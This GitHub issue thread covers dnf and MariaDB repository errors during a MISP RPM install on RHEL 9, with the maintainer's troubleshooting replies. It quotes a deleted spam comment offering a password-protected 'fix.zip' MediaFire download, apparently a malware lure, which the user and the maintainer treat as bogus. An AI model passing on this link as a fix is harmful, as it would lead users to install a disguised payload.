### ISSUE TITLE
dnf install misp misp-python-virtualenv responds with a 503 error.   

### ISSUE THREAD

**Issue by LintStalker** [amuehlem/MISP-RPM#97]
Hi, 

I am going through these instructions, and when I get down to this one:

dnf install misp misp-python-virtualenv

I get this error:

dnf install misp misp-python-virtualenv
Updating Subscription Management repositories.
mariadb                                                                                                                         2.8 kB/s | 5.1 kB     00:01
Errors during downloading metadata for repository 'mariadb':
  - Status code: 503 for https://mirror.rackspace.com/mariadb/mariadb-11.4.3/yum/rhel/9/x86_64/repodata/repomd.xml (IP: 10.110.240.125)
  - Status code: 503 for https://mirror.nodesdirect.com/mariadb/mariadb-11.4.3/yum/rhel/9/x86_64/repodata/repomd.xml (IP: 10.110.240.125)
  - Status code: 503 for https://mirror.its.dal.ca/mariadb/mariadb-11.4.3/yum/rhel/9/x86_64/repodata/repomd.xml (IP: 10.110.240.125)
Error: Failed to download metadata for repo 'mariadb': Cannot download repomd.xml: Cannot download repodata/repomd.xml: All mirrors were tried

Has the URL been updated or are these instructions obsolete?

**Comment by LintStalker** [comment]
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

Chrome is calling this file suspicious?  Are you sure it's legit?

**Comment by amuehlem** [comment]
The dnf update error looks related to your mariadb repository settings. Are you sure they are correct and the configured repository is reachable from your host?

Where did you get the mediafire url from? I don't know this URL and it does not seem to be part of the MISP installation.

I recommend to use a RHEL9 system (or similar like Rocky Linux 9, Alma Linux 9, ...), the corresponding install documentation for MISP can be found here https://github.com/amuehlem/MISP-RPM/blob/master/RHEL9.md

**Comment by LintStalker** [comment]
The mediafire link came almost immediately after I made the original posting, which I thought was strange.  I never downloaded the content figuring it was bogus.  The actual post disappeared, but I was able to quote it above.

**Comment by LintStalker** [comment]
I was able to resolve the dnf update error.

I'm now on the following instruction:

dnf install MariaDB-client MariaDB-Server and I am getting this message:

Updating Subscription Management repositories.
Red Hat Enterprise Linux 9 for x86_64 - BaseOS (RPMs)                                                                            82 kB/s | 4.1 kB     00:00
Red Hat Enterprise Linux 9 for x86_64 - AppStream (RPMs)                                                                      99 kB/s | 4.5 kB     00:00
No match for argument: MariaDB-client
No match for argument: MariaDB-Server
  * Maybe you meant: mariadb-server
Error: Unable to find a match: MariaDB-client MariaDB-Server

**Comment by LintStalker** [comment]
We adjusted our repository properties and I was able to get past this issue
